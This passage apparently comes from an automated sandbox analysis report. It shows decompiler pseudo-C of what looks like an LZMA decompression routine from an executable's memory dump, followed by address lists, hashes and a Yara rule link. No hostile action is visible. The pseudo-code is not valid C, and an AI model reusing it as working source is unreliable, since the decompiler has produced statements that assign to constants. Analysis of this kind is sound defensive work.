											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406d5a
0x00406d5a
0x00406d5a
0x00406d5a
0x00406d60
0x00406d64
0x00406d68
0x00406d72
0x00406d80
0x00407056
0x00407056
0x00407059
0x00407060
0x0040708d
0x0040708d
0x00407091
0x00000000
0x00000000
0x00407093
0x0040709c
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b4
0x004070cd
0x004070d0
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070c5
0x004070c8
0x004070c8
0x004070ea
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x00407091
0x00000000
0x00000000
0x00000000
0x004070ec
0x004070ec
0x00407065
0x00407069
0x004071a1
0x004071a1
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x0040706f
0x00407075
0x0040707c
0x00407084
0x00407084
0x00407087
0x00000000
0x00407087
0x004070f1
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x004067b8
0x00000000
0x004067bf
0x004067c3
0x00000000
0x00000000
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406824
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00407114
0x00000000
0x00407114
0x0040686e
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x00406898
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00407123
0x00000000
0x00407123
0x004068de
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x00407195
0x00000000
0x00407195
0x00406fec
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x0040700d
0x0040700d
0x00000000
0x00000000
0x00406925
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00000000
0x004069b2
0x0040692c
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc4
0x00406bc8
0x00406be6
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00406c71
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce2
0x00406ce6
0x00406ced
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00000000
0x00000000
0x00406f5b
0x00406f5b
0x00406f5f
0x00406f81
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f61
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00407056
0x00407059
0x00407060
0x00000000
0x00407063
0x0040701e
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x00407109
0x0040710c
0x0040700d
0x0040700d
0x0040700d
0x00000000
0x00407013
0x00000000
0x00406d43
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00407063
0x00000000
0x00000000
0x00000000
0x00406d88
0x00406d88
0x00406d8b
0x00406dc1
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e21
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x0040708d
0x00407056

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F5B() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
